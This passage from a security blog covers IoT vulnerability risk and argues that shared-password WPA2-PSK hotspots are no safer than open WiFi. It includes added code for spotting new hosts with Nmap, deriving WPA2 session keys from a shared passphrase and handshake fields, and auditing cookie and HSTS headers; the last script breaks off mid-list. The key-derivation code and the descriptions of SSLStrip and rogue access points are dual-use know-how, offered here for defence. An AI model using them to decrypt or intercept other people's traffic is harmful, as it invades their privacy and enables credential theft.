<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
There are huge differences between the following risks:</div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">Attackers can directly communicate with the router (or camera) from the Internet without authentication and exploit the vulnerability. This is the worst-case scenario. For example, an <a href="http://forum.synology.com/enu/viewtopic.php?f=3&t=88716" target="_blank">automated ransomware attack</a> against your NAS is pretty bad.</li>
<li style="text-align: justify;">Attackers have to position themselves in the same WAN network (e.g. Sprint mobile network in the case of Jeep hacking) to exploit the vulnerability. This is still pretty bad.</li>
<li style="text-align: justify;">The vulnerable code can not be triggered directly from the Internet, but tricks like CSRF can be used to exploit it (details later in this post). </li>
<li style="text-align: justify;">The vulnerable code can not be triggered directly from the Internet, and it uses a protocol/port which prevents <a href="https://www.kb.cert.org/vuls/id/476267" target="_blank">Cross Protocol Scripting</a>. Attackers have to access the local network before exploiting this vulnerability.</li>
</ul>
<div style="text-align: justify;">
As is the case with the worst-case scenario, one can find a lot of devices connected directly to the Internet. You can always find funny stuff at <a href="http://explorer.shodanhq.com/#/explore">http://explorer.shodanhq.com/#/explore</a> , or use the <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Using-Nmap-to-Screenshot-Web-Services/" target="_blank">nmap screenshot script</a> to find your own stuff :)</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdmXH1f-UBbBSy0AKG1lYp3nnfB9MND6iN5o0ehyFOOz_eN_94yZG3UVFVYjImrzBmzYiQHz2JPLLeiMx84jMgojTT-lVYcSE_A9DzFdTqQeI-RSuVTCfp8DxJ7jfSQx9Z3FCBc93j3oV6/s1600/shodan.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdmXH1f-UBbBSy0AKG1lYp3nnfB9MND6iN5o0ehyFOOz_eN_94yZG3UVFVYjImrzBmzYiQHz2JPLLeiMx84jMgojTT-lVYcSE_A9DzFdTqQeI-RSuVTCfp8DxJ7jfSQx9Z3FCBc93j3oV6/s400/shodan.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Network exposure</h2>
<div style="text-align: justify;">
Most devices are behind an IPv4 NAT device (e.g. home router), thus cannot be reached from the Internet side by default. Except when the device configures the firewall via UPNP. Or the device has a persistent cloud connection, and the cloud can send commands to the device. Or the device uses IPv6 tunneling (e.g. Teredo), thus it is reachable from the Internet. But not every vulnerability on your home network is accessible directly from the Internet. As more and more devices and networks will support IPv6, this scenario might change, but I hope most home routers will come with a default deny configuration in their IPv6 firewall module. On the other hand, scanning for IPv6 devices blindly is not feasible due to the large number of IPv6 addresses, but <a href="https://youtu.be/t9d7p3zxoiM?t=2437" target="_blank">some tricks might work</a>. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If attackers cannot access the device directly, there is a way to hack it through the user's browser. Just convince the victim user to visit a website, and via <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" target="_blank">CSRF (Cross Site Request Forgery)</a> and brute-forcing the device IP, it is possible to hack some devices (mostly through HTTP - if the exploit can fit into simple GET or POST commands).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHm5AXruKmb3KE7dKPjm81kmr4l9ibentnNmQNCRVtH2eLJ4dF4yqDIvS57ZFfuyd00rY7XrhIaNBeS3cEZv9YA4ziZaFQd2Hy0epDP-Dy1dxJS-tpboJpp0IeuIQ8p2eAzb3gbpA8p9sM/s1600/csrf.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHm5AXruKmb3KE7dKPjm81kmr4l9ibentnNmQNCRVtH2eLJ4dF4yqDIvS57ZFfuyd00rY7XrhIaNBeS3cEZv9YA4ziZaFQd2Hy0epDP-Dy1dxJS-tpboJpp0IeuIQ8p2eAzb3gbpA8p9sM/s640/csrf.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If attackers can not attack the device vulnerability through the Internet directly, or via CSRF, but have connected to the same network - the network exposure shrinks significantly. And when attackers are on the same network as you, I bet you have bigger problems than the security of the IoT devices ...</div>
<h2 style="text-align: justify;">
Recommendations for home users</h2>
<div>
<div style="text-align: justify;">
Don't buy **** you don't need<br />
<br />
Disconnect from the power cord the IoT devices you don't need to operate 7*24. </div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Disable cloud connectivity if it is not necessary. For example, I have a NAS device that can be reached through the "cloud", but I have disabled it by not configuring any default gateway for the device. I prefer connecting to my network via VPN and reach all my stuff through that.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Prevent CSRF attacks. I use two tricks. Don't use the 192.168.0.x - 192.168.10.x network at home - use an uncommon IP range instead (e.g. 192.168.156.x is better). The second trick is I configured my Adblock plugin in my primary browser to block access to my internal network. And I use another browser whenever I want to access my internal devices. Update: On Firefox you can use NoScript ABE to block access to internal resources.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg32YNsKBMroYZ2RknxarbOmVYOaFLgj3BUpPyeOqkI5XwptDc5M2Sx43Qwss7McUzJBGPh56SpCPHTMOpLkCA0v_NgYoEo_u6QSJoNR9AnbJfEOrnzYkbwDhqfNqjIhf7q7Xx3AczCxhWG/s1600/adblock.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg32YNsKBMroYZ2RknxarbOmVYOaFLgj3BUpPyeOqkI5XwptDc5M2Sx43Qwss7McUzJBGPh56SpCPHTMOpLkCA0v_NgYoEo_u6QSJoNR9AnbJfEOrnzYkbwDhqfNqjIhf7q7Xx3AczCxhWG/s640/adblock.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Check your router configuration:<br />
<br />
<ul>
<li>disable UPnP</li>
<li>check the firewall settings and disable unnecessary port forwards</li>
<li>check for IPv6 settings, and configure the firewall as default deny for incoming IPv6 TCP/UDP.</li>
</ul>
</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Change default passwords, especially for services connected to the Internet. <a href="http://jumpespjump.blogspot.com/2014/10/change-passwords-regularly-myth-and-lie.html" target="_blank">Follow password best practices.</a></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Run Nmap to locate new IoT in your home network :) </div>
</div>
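<div style="text-align: justify;">
Locating new devices with Nmap only pays off if you compare each scan against what you already know is on the network. The following is an added example, not from the post: it parses Nmap's greppable output, keeps the hosts reported up, and prints the ones missing from a baseline inventory. The scan lines and the baseline are constructed so it runs offline; the 192.168.156.0/24 range is the one suggested earlier in the post, and on a real network SAMPLE_SCAN would come from nmap -sn -oG - over your subnet.</div>

```shell
#!/bin/sh
# Added example, not from the post: finds hosts that appeared on the home
# network since a baseline inventory was taken, using nmap's greppable output.
# The scan lines below are constructed so the script runs offline; on a real
# network replace SAMPLE_SCAN with the output of:
#     nmap -sn -oG - 192.168.156.0/24
# (-sn = host discovery only, -oG - = greppable output on stdout).

# Known devices, one IP per line (constructed baseline; keep yours in a file
# under version control so the diff stays meaningful over time).
BASELINE='192.168.156.1
192.168.156.20
192.168.156.30
'

# Constructed nmap -sn -oG output: router, laptop, NAS, one unknown host that
# is up, and one address reported down.
SAMPLE_SCAN='# Nmap 7.80 scan initiated as: nmap -sn -oG - 192.168.156.0/24
Host: 192.168.156.1 (router.lan)    Status: Up
Host: 192.168.156.20 (laptop.lan)   Status: Up
Host: 192.168.156.30 (nas.lan)      Status: Up
Host: 192.168.156.77 ()             Status: Up
Host: 192.168.156.99 ()             Status: Down
# Nmap done: 256 IP addresses (4 hosts up) scanned
'

# up_hosts: read greppable output on stdin, print the IPs reported "Status: Up"
up_hosts() {
    awk '$1 == "Host:" && /Status: Up/ { print $2 }' | sort -u
}

# new_hosts BASELINE_TEXT SCAN_TEXT -> IPs that are up but not in the baseline
new_hosts() {
    base="${TMPDIR:-/tmp}/baseline.$$"
    printf '%s' "$1" | sort -u > "$base"
    printf '%s' "$2" | up_hosts | comm -13 "$base" -
    rm -f "$base"
}

demo() {
    found=$(new_hosts "$BASELINE" "$SAMPLE_SCAN")
    if [ -n "$found" ]; then
        echo "new device(s) on the network:"
        echo "$found"      # 192.168.156.77
    else
        echo "no new devices"
    fi
}

demo
```

<div style="text-align: justify;">
Once a new address has been identified and you know what it is, append it to the baseline; anything that shows up later without you adding it is the camera, set-top box or cable modem WiFi you did not know you had.</div>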
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Run a WiFi scan to locate new WiFi access points. Let me share a personal experience with you. I moved to a new house and brought my own WiFi router with me. I plugged it in, and forgot about WiFi. Months later it turned out I had two other WiFi devices in my house - the cable modem had its own integrated WiFi with default passwords printed on the bottom, and the Set-top-box was the same - default WiFi passwords printed on the bottom. And don't forget to scan for ZigBee, Bluetooth, IrDA, FM, ...</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Update your devices - in case you have a lot of free time on your hands.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Don't allow your guests to connect to your home network. Set up a separate AP for them. Imagine your nephew stealing your private photos or videos from your NAS or DLNA server.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
With great power comes great responsibility. The fewer devices you own in your house, the less time you need to maintain them.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Read the manuals of your devices. Be aware of the different interfaces. Configure them securely.</div>
<div style="text-align: justify;">
<br />
Disable Teredo protocol in case you don't need IPv6.<br />
<br /></div>
<div style="text-align: justify;">
Stop being amazed by junk hacking.<br />
<br />
Update: Disable WebRTC: <a href="https://www.browserleaks.com/webrtc" target="_blank">https://www.browserleaks.com/webrtc</a> , in Chrome you can use this extension: <a href="https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia">https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia</a></div>
</div>
<div>
<div style="text-align: justify;">
<br />
Update: Prevent DNS rebinding attacks by configuring a DNS server which can block internal IP addresses. OpenDNS can block internal IPs, but this is not a default option; you have to configure it.<br />
<h2>
Recommendations for vendors</h2>
<div>
For vendors, I recommend at least the following:</div>
<div style="text-align: start;">
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">Implement security during Software Development LifeCycle</li>
<li style="text-align: justify;">Continuous security testing and bug bounties</li>
<li style="text-align: justify;">Seamless auto-update</li>
<li style="text-align: justify;">Opt-in cloud connectivity</li>
</ul>
<div style="text-align: justify;">
<br /></div>
</div>
</div>
</div>
<div>
<h2 style="text-align: justify;">
Recommendations for journalists</h2>
</div>
<div>
<div style="text-align: justify;">
Stop FUD. Pretty please.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<h2 style="text-align: justify;">
The questions to ask before losing your head</h2>
<div>
<ul>
<li style="text-align: justify;">who can exploit the vulnerability?</li>
<li style="text-align: justify;">what prerequisites do we have about the attack to successfully exploit the vulnerability? Is the attacker already in your home network? If yes, you have probably bigger problems.</li>
<li style="text-align: justify;">what can the attacker do when the exploit is successful?</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
And last but not least, don't forget that in the case of IoT devices, sometimes users are the product, not the customer. IoT is about collecting data for marketing purposes.</div>
</div>
<div>
<div style="text-align: justify;">
<a href="http://blog.open-xchange.com/2015/02/09/iot/">http://blog.open-xchange.com/2015/02/09/iot/</a><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCG8ESkDlv6mogAXJTRL-9AW8BNyFNcyDIPkqKlJTI-IFOhPD7stONWpqygo44Z4j0j22J2iiIbUc4sehrLDp2MsR2V8xOfwX6tmWyCeTPr-uiBaJkFwrWHjlWkyJXFAeq2tHkPK1THbq0/s1600/ios.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCG8ESkDlv6mogAXJTRL-9AW8BNyFNcyDIPkqKlJTI-IFOhPD7stONWpqygo44Z4j0j22J2iiIbUc4sehrLDp2MsR2V8xOfwX6tmWyCeTPr-uiBaJkFwrWHjlWkyJXFAeq2tHkPK1THbq0/s320/ios.png" width="248" /></a></div>
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<h1>Mythbusters: Is an open (unencrypted) WiFi more dangerous than a WPA2-PSK? Actually, it is not.</h1>
<div>Published 2015-07-23, updated 2019-10-08</div>
<h2>
Introduction</h2>
<div>
<br /></div>
<div style="text-align: justify;">
Whenever security professionals recommend the 5 most important IT security practices to average users, one of the items is usually something like: “Avoid using open Wifi” or “Always use VPN while using open WiFi” or “Avoid sensitive websites (e.g. online banking) while using open WiFI”, etc.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
What do I think about this? It is bullshit. But let’s not jump to conclusions. Let’s analyze all the risks and factors here.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxBTj92DHv5M47xjGw-TZ7Qvr6BOWSM_I2V_KiX1zqKECvguuq6yNY6VhI-BFIMDtM0BizQMb1AzgEHlRBueq1eGdmicBKXRvF6RtNDRDng6I4qVIQjw-E3DBbe350RF4O1ThbQ7uI0pCP/s1600/chive-thursday-29.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxBTj92DHv5M47xjGw-TZ7Qvr6BOWSM_I2V_KiX1zqKECvguuq6yNY6VhI-BFIMDtM0BizQMb1AzgEHlRBueq1eGdmicBKXRvF6RtNDRDng6I4qVIQjw-E3DBbe350RF4O1ThbQ7uI0pCP/s320/chive-thursday-29.jpg" width="270" /></a></div>
<br />
<br />
<div style="text-align: justify;">
During the following analysis, I made two assumptions. The first one is that we are comparing public WiFi hotspots with no encryption at all (referred to as Open) with public WiFi hotspots using WPA2-PSK (and just hope WEP died years ago). The other assumption is that there are people who are security-aware, and those who just don’t care. The latter just want to browse the web, access Facebook, write e-mails, etc.</div>
<br />
<h3>
The risks</h3>
<div>
<br /></div>
<div style="text-align: justify;">
Let’s discuss the different threats people face using public hotspots, compared to home/work internet usage:</div>
<div style="text-align: justify;">
1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Where the website session data is not protected with SSL/TLS (and the cookie is not protected with the Secure flag), attackers on the same hotspot can obtain the session data and use it to hijack the session or steal login credentials. Typical protocols affected:</div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">HTTP sites</li>
<li style="text-align: justify;">HTTPS sites but unsecured cookie</li>
<li style="text-align: justify;">FTP without encryption</li>
<li style="text-align: justify;">IMAP/SMTP/POP3 without SSL/TLS or STARTTLS</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
2.<span class="Apple-tab-span" style="white-space: pre;"> </span>Attackers can inject extra data into the HTTP traffic, which can be used for exploits or social engineering attacks (e.g. a fake "update Flash Player" prompt that actually delivers malware) – see the <a href="https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" target="_blank">Dark Hotel campaign</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
3.<span class="Apple-tab-span" style="white-space: pre;"> </span>Attackers can use tools like SSLStrip to keep the user’s traffic on cleartext HTTP and steal passwords, session data and personal information</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
4.<span class="Apple-tab-span" style="white-space: pre;"> </span>Attackers can monitor and track user activity</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
5.<span class="Apple-tab-span" style="white-space: pre;"> </span>Attackers can directly attack the user’s machine (e.g. SMB service)</div>
<br />
<h3>
WPA2-PSK security</h3>
<br />
<div style="text-align: justify;">
So, why is a public WPA2-PSK WiFi safer than an open WiFi? Spoiler alert: it is not!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In a generic public WPA2-PSK scenario, all users share the same password. And guess what, all the traffic can be decrypted with the following information: SSID + shared password + information from the 4-way handshake. <a href="https://wiki.wireshark.org/HowToDecrypt802.11">https://wiki.wireshark.org/HowToDecrypt802.11</a></div>
<div style="text-align: justify;">
If you want to see it in action, here is a nice tutorial for you</div>
<div style="text-align: justify;">
<a href="http://www.lovemytool.com/blog/2010/05/wireshark-and-tshark-decrypt-sample-capture-file-by-joke-snelders.html">http://www.lovemytool.com/blog/2010/05/wireshark-and-tshark-decrypt-sample-capture-file-by-joke-snelders.html</a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvZLXuIHz7kfYLZxUFhLlVcPLMbM7Ey2HfGitlUqlq_eErcpQ877PI7i1dPO1OLvnSn98b2j-PBFYAPB0GN9zHGXC08cQBAQqu99fudCOD8T5Pi5-RSapgHQCxyOUJ2S2DlVJdPepbf2J0/s1600/6a00e008d95770883401348056c1d8970c.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvZLXuIHz7kfYLZxUFhLlVcPLMbM7Ey2HfGitlUqlq_eErcpQ877PI7i1dPO1OLvnSn98b2j-PBFYAPB0GN9zHGXC08cQBAQqu99fudCOD8T5Pi5-RSapgHQCxyOUJ2S2DlVJdPepbf2J0/s400/6a00e008d95770883401348056c1d8970c.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Decrypted WPA2-PSK traffic</td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
Any user having access to the same WPA2-PSK network knows this information, so they can instantly decrypt your traffic. Or the attackers can just set up an access point with the same SSID, the same password, and a stronger signal. And now, the attacker can instantly launch active man-in-the-middle attacks. It is a common belief (even among ITSEC experts) that WPA2-PSK is not vulnerable to this attack. I am not sure why this weakness was left in the protocol; if you have the answer, let me know. Edit (2015-08-03): I think the key message here is that without server authentication (e.g. via PKI), it is not possible to solve this.</div>
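<div style="text-align: justify;">
To make the point above concrete, here is an added worked example (my code, not from the original post) of the standard WPA2-PSK key derivation in Python. The PMK is PBKDF2-HMAC-SHA1 over the passphrase and the SSID, and the per-session PTK is PRF-384 over the PMK, both MAC addresses and both nonces, all of which travel unencrypted in the 4-way handshake. The SSID, passphrase, MAC addresses and nonces in <code>demo()</code> are constructed values; the only real input is the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE"). The PRF and the CCMP key layout follow IEEE 802.11i; function names such as <code>derive_pmk</code> are mine.</div>

```python
import hashlib
import hmac
from typing import Dict


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    # It depends only on the shared password and the SSID, so every user of
    # the same hotspot holds the very same PMK.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    # IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)
    # for i = 0, 1, ... and keep the first `length` bytes.
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
        counter += 1
    return out[:length]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> Dict[str, bytes]:
    # PTK = PRF-384(PMK, "Pairwise key expansion",
    #               min(MACs) || max(MACs) || min(nonces) || max(nonces)).
    # Every input except the PMK is sent in the clear in the 4-way handshake.
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    # CCMP layout: KCK (EAPOL MIC key), KEK (EAPOL key-wrap key), TK (data key).
    return {"KCK": ptk[:16], "KEK": ptk[16:32], "TK": ptk[32:48]}


def demo() -> Dict[str, bytes]:
    # Constructed hotspot parameters; none of these come from a real network.
    ssid, passphrase = "CafeFreeWiFi", "coffee1234"
    ap_mac = bytes.fromhex("00112233aabb")
    client_mac = bytes.fromhex("66778899ccdd")
    anonce = hashlib.sha256(b"constructed ANonce").digest()  # 32 bytes
    snonce = hashlib.sha256(b"constructed SNonce").digest()  # 32 bytes

    # The legitimate client derives its session data key ...
    client_tk = derive_ptk(derive_pmk(passphrase, ssid),
                           ap_mac, client_mac, anonce, snonce)["TK"]
    # ... and any other guest who knows the shared PSK and has seen the
    # handshake fields derives exactly the same key (argument order does
    # not matter because of the min/max ordering in the derivation).
    other_guest_tk = derive_ptk(derive_pmk(passphrase, ssid),
                                client_mac, ap_mac, snonce, anonce)["TK"]
    # Without the right PSK the derivation yields an unrelated key.
    wrong_psk_tk = derive_ptk(derive_pmk("not-the-password", ssid),
                              ap_mac, client_mac, anonce, snonce)["TK"]
    return {"client_tk": client_tk, "other_guest_tk": other_guest_tk,
            "wrong_psk_tk": wrong_psk_tk}


if __name__ == "__main__":
    for name, key in demo().items():
        print(f"{name}: {key.hex()}")
```

<div style="text-align: justify;">
The demo shows that a second guest holding the same PSK derives the identical TK from the observable handshake fields, which is exactly why a shared password keeps outsiders off the link but gives no confidentiality between users of the hotspot. Only a per-user key (as in WPA2-Enterprise) or an upper-layer protocol with server authentication (TLS) closes that gap, which is the point of the 2015-08-03 edit above.</div>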
<div style="text-align: justify;">
Let me link here one of my previous posts with a great skiddie tool:</div>
<div style="text-align: justify;">
<a href="http://jumpespjump.blogspot.nl/2014/04/dsploit.html">http://jumpespjump.blogspot.nl/2014/04/dsploit.html</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
To sum up, attackers on a WPA2-PSK network can:</div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">Decrypt all HTTP/FTP/IMAP/SMTP/POP3 passwords or other sensitive information</li>
<li style="text-align: justify;">Launch active attacks like SSLStrip, or modify HTTP traffic to include exploits or social engineering attacks</li>
<li style="text-align: justify;">Monitor/track user activity</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The only difference between open and WPA2-PSK networks is that an open network can be attacked by someone with a skill level of 1 out of 10, while the WPA2-PSK network needs an attacker with a skill level of 1.5. That is the difference.</div>
<br />
<h3>
The real solutions</h3>
<div>
<br /></div>
<br />
<div style="text-align: justify;">
1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Website owners and service providers should deploy proper (trusted) SSL/TLS infrastructure, protect session cookies, etc. Whenever a user (or security professional) notices a problem with the quality of the service (e.g. missing SSL/TLS), the service provider has to be notified. If no change is made, it is recommended to drop the service provider and choose a more secure one. Users have to use the HTTPS Everywhere plugin.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
2.<span class="Apple-tab-span" style="white-space: pre;"> </span>Protect the device against exploits by patching the software on it, use a secure browser (Chrome, IE11 + enhanced protection), disable unnecessary plugins (Java, Flash, Silverlight), or at least use them via click-to-play. Also, using exploit mitigation tools (EMET, HitmanPro.Alert, Malwarebytes Anti-Exploit) and a good internet security suite is a good idea.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
3.<span class="Apple-tab-span" style="white-space: pre;"> </span>Website owners have to deploy <a href="https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security" target="_blank">HSTS</a>, and optionally include their site in an <a href="https://hstspreload.appspot.com/" target="_blank">HSTS preload list</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
4.<span class="Apple-tab-span" style="white-space: pre;"> </span>Don’t click blindly on fake downloads (like fake Flash Player updates)</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcW2mAw5SA142hXIFxIHwpdWLKAnGwgRMAM5b4oiz4gCxxECRQgaUTvvaqnx5pOmr2z5myD_RQFEapE8stS5oUM7_fLssQXoCp8JeMWBQKm63CyQnDXJ8ZjzMZdVTGfHJd12kSOGckXh9e/s1600/scandesk.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcW2mAw5SA142hXIFxIHwpdWLKAnGwgRMAM5b4oiz4gCxxECRQgaUTvvaqnx5pOmr2z5myD_RQFEapE8stS5oUM7_fLssQXoCp8JeMWBQKm63CyQnDXJ8ZjzMZdVTGfHJd12kSOGckXh9e/s400/scandesk.jpg" width="400" /></a></div>
<br />
<br />
<div style="text-align: justify;">
5.<span class="Apple-tab-span" style="white-space: pre;"> </span>The benefits of a VPN are usually overestimated. A VPN provider is just another provider, like the hotspot provider or the ISP. They can do the same malicious stuff (traffic injection, traffic monitoring, user tracking), especially free VPNs. And “Average Joe” will choose a free VPN. Also, VPN connections tend to get disconnected, and almost none of the VPN providers offer a fail-secure VPN (one that blocks all traffic when the tunnel drops). Also, for the price of a good VPN service you can buy a good data plan and use 4G/3G instead of low-quality public hotspots. But despite all this, on mobile OSes (Android, iOS, etc.) I strongly recommend the use of a VPN, because it is not practically feasible for users to know which app is using SSL/TLS and which is not.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
6.<span class="Apple-tab-span" style="white-space: pre;"> </span>Use a location-aware firewall, and whenever the network is not trusted, set it to the Public profile.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlQ5S16qLVjAopmI6k_PCJ1xvFxTaH4OI2eYSU9SsFUM5jhH4R3gx39zcyV7o8lIQjdR0xqS4qHuHKomaq5n1GgYk-PN9Z3P4IvO1L5g3lAXNz5R3xz4jj69YJbzYbLKGTB31IciaySaNL/s1600/2251.clip_image001_627A00E5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="269" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlQ5S16qLVjAopmI6k_PCJ1xvFxTaH4OI2eYSU9SsFUM5jhH4R3gx39zcyV7o8lIQjdR0xqS4qHuHKomaq5n1GgYk-PN9Z3P4IvO1L5g3lAXNz5R3xz4jj69YJbzYbLKGTB31IciaySaNL/s320/2251.clip_image001_627A00E5.png" width="320" /></a></div>
<br />
<div style="text-align: justify;">
7.<span class="Apple-tab-span" style="white-space: pre;"> </span>In a small-business/home environment, buy a WiFi router with a guest WiFi option, so that the guest network can use a different password from the one used for the main network.</div>
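<div style="text-align: justify;">
Points 1 and 3 above (Secure session cookies and HSTS) can be checked mechanically on a captured response. The following is an added example (my code, not from the original post): it audits a list of HTTP response headers, flags every Set-Cookie without the Secure and HttpOnly attributes, and checks the Strict-Transport-Security header for a max-age of at least one year plus includeSubDomains and preload, which are the requirements of the preload list linked above. The two header sets are constructed, one weak and one hardened; the check treats every cookie as sensitive, which you would relax for known harmless ones.</div>

```python
from typing import Dict, List, Tuple

Header = Tuple[str, str]
ONE_YEAR = 31536000  # seconds; the HSTS preload list requires at least this


def parse_directives(parts: List[str]) -> Dict[str, str]:
    # Turn ['Path=/', 'Secure', 'Max-Age=300'] into a lower-cased map;
    # flag-style directives get an empty value.
    directives: Dict[str, str] = {}
    for part in parts:
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        directives[key.strip().lower()] = value.strip().strip('"')
    return directives


def audit_cookie(set_cookie: str) -> List[str]:
    # Every cookie is treated as sensitive here.
    parts = set_cookie.split(";")
    name = parts[0].partition("=")[0].strip()
    attrs = parse_directives(parts[1:])
    findings = []
    if "secure" not in attrs:
        findings.append(f"cookie {name}: no Secure flag, the browser also sends it over plain HTTP")
    if "httponly" not in attrs:
        findings.append(f"cookie {name}: no HttpOnly flag, readable from injected script")
    return findings


def audit_hsts(headers: List[Header]) -> List[str]:
    values = [v for k, v in headers if k.lower() == "strict-transport-security"]
    if not values:
        return ["no Strict-Transport-Security header, the first request can be kept on HTTP"]
    directives = parse_directives(values[0].split(";"))
    findings = []
    try:
        max_age = int(directives.get("max-age", ""))
    except ValueError:
        max_age = 0
    if max_age < ONE_YEAR:
        findings.append(f"HSTS max-age={max_age} is shorter than one year")
    if "includesubdomains" not in directives:
        findings.append("HSTS: includeSubDomains missing, subdomains stay downgradable")
    if "preload" not in directives:
        findings.append("HSTS: preload missing, site cannot be added to the preload list")
    return findings


def audit_response(headers: List[Header]) -> List[str]:
    findings: List[str] = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            findings.extend(audit_cookie(value))
    findings.extend(audit_hsts(headers))
    return findings


# Constructed response headers: a weak and a hardened variant of the same site.
WEAK_RESPONSE: List[Header] = [
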